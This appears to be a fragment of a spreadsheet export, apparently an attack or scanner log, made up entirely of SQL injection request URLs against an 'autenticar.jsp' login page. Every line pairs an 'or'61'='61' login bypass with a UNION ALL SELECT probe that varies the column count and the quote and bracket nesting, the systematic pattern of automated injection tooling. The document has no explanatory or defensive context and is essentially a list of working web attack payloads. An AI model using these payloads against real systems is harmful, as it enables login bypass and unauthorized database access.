    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect4493,4493,4493,4493,4493,4493,4493,4493,4493,4493,4493,4493,4493,4493,4493,4493,4493,4493,4493,4493,4493,4493,4493,4493,4493,4493,4493,4493,4493#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2069,2069,2069,2069,2069,2069,2069,2069,2069,2069,2069,2069,2069,2069,2069,2069,2069,2069,2069,2069,2069,2069,2069,2069,2069,2069,2069,2069,2069,2069#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7132,7132,7132,7132,7132,7132,7132,7132,7132,7132,7132,7132,7132,7132,7132,7132,7132,7132,7132,7132,7132#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157,7157#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5847,5847,5847,5847,5847,5847,5847,5847,5847,5847,5847,5847,5847,5847,5847,5847,5847,5847,5847,5847,5847,5847,5847#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077,5077#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8998,8998,8998,8998,8998,8998,8998,8998,8998,8998,8998,8998,8998,8998,8998,8998,8998,8998,8998,8998,8998,8998,8998,8998,8998#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect7716,7716,7716,7716,7716,7716,7716,7716,7716,7716,7716,7716,7716,7716,7716,7716,7716,7716,7716,7716,7716,7716,7716,7716,7716,7716#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247,4247#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect9701,9701,9701,9701,9701,9701,9701,9701,9701,9701,9701,9701,9701,9701,9701,9701,9701,9701,9701,9701,9701,9701,9701,9701,9701,9701,9701,9701#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014,2014#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselect8322,8322,8322,8322,8322,8322,8322,8322,8322,8322,8322,8322,8322,8322,8322,8322,8322,8322,8322,8322,8322,8322,8322,8322,8322,8322,8322,8322,8322,8322#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024,1024#and(5702=5702&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971,2971#and(6473=6473&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect4675,4675,4675,4675,4675,4675,4675,4675,4675,4675,4675,4675,4675,4675,4675,4675,4675,4675,4675,4675,4675,4675,4675#and(6068=6068&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect1394,1394,1394,1394,1394,1394,1394,1394,1394,1394,1394,1394,1394,1394,1394,1394,1394,1394,1394,1394,1394,1394,1394,1394#and(3275=3275&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect7886,7886,7886,7886,7886,7886,7886,7886,7886,7886,7886,7886,7886,7886,7886,7886,7886,7886,7886,7886,7886,7886,7886,7886,7886#and(1190=1190&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect476,476,476,476,476,476,476,476,476,476,476,476,476,476,476,476,476,476,476,476,476,476,476,476,476,476#and(7379=7379&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825#and(442=442&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549,1549#and(3245=3245&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693,8693#and(5877=5877&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)unionallselect8990,8990,8990,8990,8990,8990,8990,8990,8990,8990,8990,8990,8990,8990,8990,8990,8990,8990,8990,8990,8990,8990,8990,8990,8990,8990,8990,8990,8990,8990#and(8581=8581&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect3632,3632,3632,3632,3632,3632,3632,3632,3632,3632,3632,3632,3632,3632,3632,3632,3632,3632,3632,3632,3632#and((2971=2971&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253#and((3628=3628&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect277,277,277,277,277,277,277,277,277,277,277,277,277,277,277,277,277,277,277,277,277,277,277#and((1336=1336&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect2676,2676,2676,2676,2676,2676,2676,2676,2676,2676,2676,2676,2676,2676,2676,2676,2676,2676,2676,2676,2676,2676,2676,2676#and((2727=2727&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect7339,7339,7339,7339,7339,7339,7339,7339,7339,7339,7339,7339,7339,7339,7339,7339,7339,7339,7339,7339,7339,7339,7339,7339,7339#and((7145=7145&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect5202,5202,5202,5202,5202,5202,5202,5202,5202,5202,5202,5202,5202,5202,5202,5202,5202,5202,5202,5202,5202,5202,5202,5202,5202,5202#and((3524=3524&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect9509,9509,9509,9509,9509,9509,9509,9509,9509,9509,9509,9509,9509,9509,9509,9509,9509,9509,9509,9509,9509,9509,9509,9509,9509,9509,9509#and((7911=7911&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect5207,5207,5207,5207,5207,5207,5207,5207,5207,5207,5207,5207,5207,5207,5207,5207,5207,5207,5207,5207,5207,5207,5207,5207,5207,5207,5207,5207#and((7667=7667&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864,6864#and((4760=4760&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect8072,8072,8072,8072,8072,8072,8072,8072,8072,8072,8072,8072,8072,8072,8072,8072,8072,8072,8072,8072,8072,8072,8072,8072,8072,8072,8072,8072,8072,8072#and((1757=1757&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect8770,8770,8770,8770,8770,8770,8770,8770,8770,8770,8770,8770,8770,8770,8770,8770,8770,8770,8770,8770,8770#and(((7936=7936&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect1239,1239,1239,1239,1239,1239,1239,1239,1239,1239,1239,1239,1239,1239,1239,1239,1239,1239,1239,1239,1239,1239#and(((649=649&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect5791,5791,5791,5791,5791,5791,5791,5791,5791,5791,5791,5791,5791,5791,5791,5791,5791,5791,5791,5791,5791,5791,5791#and(((6826=6826&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571,5571#and(((3383=3383&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect8098,8098,8098,8098,8098,8098,8098,8098,8098,8098,8098,8098,8098,8098,8098,8098,8098,8098,8098,8098,8098,8098,8098,8098,8098#and(((8450=8450&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect2130,2130,2130,2130,2130,2130,2130,2130,2130,2130,2130,2130,2130,2130,2130,2130,2130,2130,2130,2130,2130,2130,2130,2130,2130,2130#and(((8435=8435&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect345,345,345,345,345,345,345,345,345,345,345,345,345,345,345,345,345,345,345,345,345,345,345,345,345,345,345#and(((2751=2751&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect2178,2178,2178,2178,2178,2178,2178,2178,2178,2178,2178,2178,2178,2178,2178,2178,2178,2178,2178,2178,2178,2178,2178,2178,2178,2178,2178,2178#and(((3698=3698&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect1265,1265,1265,1265,1265,1265,1265,1265,1265,1265,1265,1265,1265,1265,1265,1265,1265,1265,1265,1265,1265,1265,1265,1265,1265,1265,1265,1265,1265#and(((4905=4905&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect7724,7724,7724,7724,7724,7724,7724,7724,7724,7724,7724,7724,7724,7724,7724,7724,7724,7724,7724,7724,7724,7724,7724,7724,7724,7724,7724,7724,7724,7724#and(((5848=5848&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect3323,3323,3323,3323,3323,3323,3323,3323,3323,3323,3323,3323,3323,3323,3323,3323,3323,3323,3323,3323,3323#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525,6525#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346,1346#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect9595,9595,9595,9595,9595,9595,9595,9595,9595,9595,9595,9595,9595,9595,9595,9595,9595,9595,9595,9595,9595,9595,9595,9595#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect2340,2340,2340,2340,2340,2340,2340,2340,2340,2340,2340,2340,2340,2340,2340,2340,2340,2340,2340,2340,2340,2340,2340,2340,2340#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635,1635#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect8568,8568,8568,8568,8568,8568,8568,8568,8568,8568,8568,8568,8568,8568,8568,8568,8568,8568,8568,8568,8568,8568,8568,8568,8568,8568,8568#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect8123,8123,8123,8123,8123,8123,8123,8123,8123,8123,8123,8123,8123,8123,8123,8123,8123,8123,8123,8123,8123,8123,8123,8123,8123,8123,8123,8123#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect4298,4298,4298,4298,4298,4298,4298,4298,4298,4298,4298,4298,4298,4298,4298,4298,4298,4298,4298,4298,4298,4298,4298,4298,4298,4298,4298,4298,4298#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect4084,4084,4084,4084,4084,4084,4084,4084,4084,4084,4084,4084,4084,4084,4084,4084,4084,4084,4084,4084,4084,4084,4084,4084,4084,4084,4084,4084,4084,4084#&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952#and('diuy'='diuy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082,5082#and('mecu'='mecu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514,6514#and('tqrw'='tqrw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect3118,3118,3118,3118,3118,3118,3118,3118,3118,3118,3118,3118,3118,3118,3118,3118,3118,3118,3118,3118,3118,3118,3118,3118#and('alyh'='alyh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7758,7758,7758,7758,7758,7758,7758,7758,7758,7758,7758,7758,7758,7758,7758,7758,7758,7758,7758,7758,7758,7758,7758,7758,7758#and('krte'='krte&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2959,2959,2959,2959,2959,2959,2959,2959,2959,2959,2959,2959,2959,2959,2959,2959,2959,2959,2959,2959,2959,2959,2959,2959,2959,2959#and('naug'='naug&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect6308,6308,6308,6308,6308,6308,6308,6308,6308,6308,6308,6308,6308,6308,6308,6308,6308,6308,6308,6308,6308,6308,6308,6308,6308,6308,6308#and('yyrq'='yyrq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170,9170#and('dfie'='dfie&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect761,761,761,761,761,761,761,761,761,761,761,761,761,761,761,761,761,761,761,761,761,761,761,761,761,761,761,761,761#and('hkho'='hkho&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7805,7805,7805,7805,7805,7805,7805,7805,7805,7805,7805,7805,7805,7805,7805,7805,7805,7805,7805,7805,7805,7805,7805,7805,7805,7805,7805,7805,7805,7805#and('jbhp'='jbhp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect9096,9096,9096,9096,9096,9096,9096,9096,9096,9096,9096,9096,9096,9096,9096,9096,9096,9096,9096,9096,9096#and(('llzy'='llzy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835,3835#and(('rlpj'='rlpj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6434,6434,6434,6434,6434,6434,6434,6434,6434,6434,6434,6434,6434,6434,6434,6434,6434,6434,6434,6434,6434,6434,6434#and(('rhbb'='rhbb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect9990,9990,9990,9990,9990,9990,9990,9990,9990,9990,9990,9990,9990,9990,9990,9990,9990,9990,9990,9990,9990,9990,9990,9990#and(('kmwq'='kmwq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3802,3802,3802,3802,3802,3802,3802,3802,3802,3802,3802,3802,3802,3802,3802,3802,3802,3802,3802,3802,3802,3802,3802,3802,3802#and(('ucwx'='ucwx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect819,819,819,819,819,819,819,819,819,819,819,819,819,819,819,819,819,819,819,819,819,819,819,819,819,819#and(('keww'='keww&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect6429,6429,6429,6429,6429,6429,6429,6429,6429,6429,6429,6429,6429,6429,6429,6429,6429,6429,6429,6429,6429,6429,6429,6429,6429,6429,6429#and(('vczk'='vczk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108,9108#and(('qmmg'='qmmg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643,7643#and(('roxh'='roxh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect9552,9552,9552,9552,9552,9552,9552,9552,9552,9552,9552,9552,9552,9552,9552,9552,9552,9552,9552,9552,9552,9552,9552,9552,9552,9552,9552,9552,9552,9552#and(('cydd'='cydd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect1203,1203,1203,1203,1203,1203,1203,1203,1203,1203,1203,1203,1203,1203,1203,1203,1203,1203,1203,1203,1203#and((('npul'='npul&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6601,6601,6601,6601,6601,6601,6601,6601,6601,6601,6601,6601,6601,6601,6601,6601,6601,6601,6601,6601,6601,6601#and((('ygga'='ygga&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect3376,3376,3376,3376,3376,3376,3376,3376,3376,3376,3376,3376,3376,3376,3376,3376,3376,3376,3376,3376,3376,3376,3376#and((('nakk'='nakk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915,6915#and((('cfrp'='cfrp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491,3491#and((('igsi'='igsi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303,7303#and((('vxwg'='vxwg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect7337,7337,7337,7337,7337,7337,7337,7337,7337,7337,7337,7337,7337,7337,7337,7337,7337,7337,7337,7337,7337,7337,7337,7337,7337,7337,7337#and((('xjog'='xjog&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect4043,4043,4043,4043,4043,4043,4043,4043,4043,4043,4043,4043,4043,4043,4043,4043,4043,4043,4043,4043,4043,4043,4043,4043,4043,4043,4043,4043#and((('cgsc'='cgsc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect1970,1970,1970,1970,1970,1970,1970,1970,1970,1970,1970,1970,1970,1970,1970,1970,1970,1970,1970,1970,1970,1970,1970,1970,1970,1970,1970,1970,1970#and((('swkv'='swkv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782,2782#and((('howv'='howv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2299,2299,2299,2299,2299,2299,2299,2299,2299,2299,2299,2299,2299,2299,2299,2299,2299,2299,2299,2299,2299#and'mfdt'='mfdt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3501,3501,3501,3501,3501,3501,3501,3501,3501,3501,3501,3501,3501,3501,3501,3501,3501,3501,3501,3501,3501,3501#and'bykb'='bykb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9295,9295,9295,9295,9295,9295,9295,9295,9295,9295,9295,9295,9295,9295,9295,9295,9295,9295,9295,9295,9295,9295,9295#and'mcwn'='mcwn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8681,8681,8681,8681,8681,8681,8681,8681,8681,8681,8681,8681,8681,8681,8681,8681,8681,8681,8681,8681,8681,8681,8681,8681#and'hdyn'='hdyn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375,3375#and'ehzw'='ehzw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235#and'yjov'='yjov&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect376,376,376,376,376,376,376,376,376,376,376,376,376,376,376,376,376,376,376,376,376,376,376,376,376,376,376#and'ipyf'='ipyf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387,9387#and'hjwv'='hjwv&amp;modo=entrar</t>
  </si>
  <si>
